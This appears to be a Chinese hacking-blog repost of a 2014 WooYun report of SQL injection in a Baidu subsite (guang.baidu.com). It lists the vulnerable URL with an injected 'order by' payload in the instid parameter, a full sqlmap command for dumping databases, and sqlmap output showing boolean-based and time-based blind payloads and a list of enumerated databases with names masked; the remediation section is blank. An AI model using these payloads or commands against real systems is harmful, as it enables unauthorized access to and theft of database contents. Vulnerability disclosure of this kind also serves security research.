记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

百度某分站SQL注射

2014-12-24 15:20

http://guang.baidu.com/g/getinst?intPage=0&instid=5%27%20order%20by%201%20limit%200,1%23



instid 存在注入,要登陆



漏洞证明:

code 区域
python sqlmap.py -u "http://guang.baidu.com/g/getinst?intPage=0&instid=5" -p instid --prefix "'" --suffix "limit 0,1#" --string "v2ex.com"  --dbms=mysql --cookie "cookie" --dbs



sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program



[*] starting at 22:06:06



[22:06:11] [INFO] testing connection to the target URL

[22:06:12] [INFO] testing if the provided string is within the target URL page content

[22:06:12] [WARNING] you provided 'v2ex.com' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: instid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: intPage=0&instid=5' AND 7341=7341 limit 0,1#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: intPage=0&instid=5' AND SLEEP(5) limit 0,1#

---





code 区域
available databases [5]:

[*] Dr*****

[*] Dr*****

[*] Dr*****

[*] Dr*****

[*] information_schema







修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-082625

阅读:76807 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“百度某分站SQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云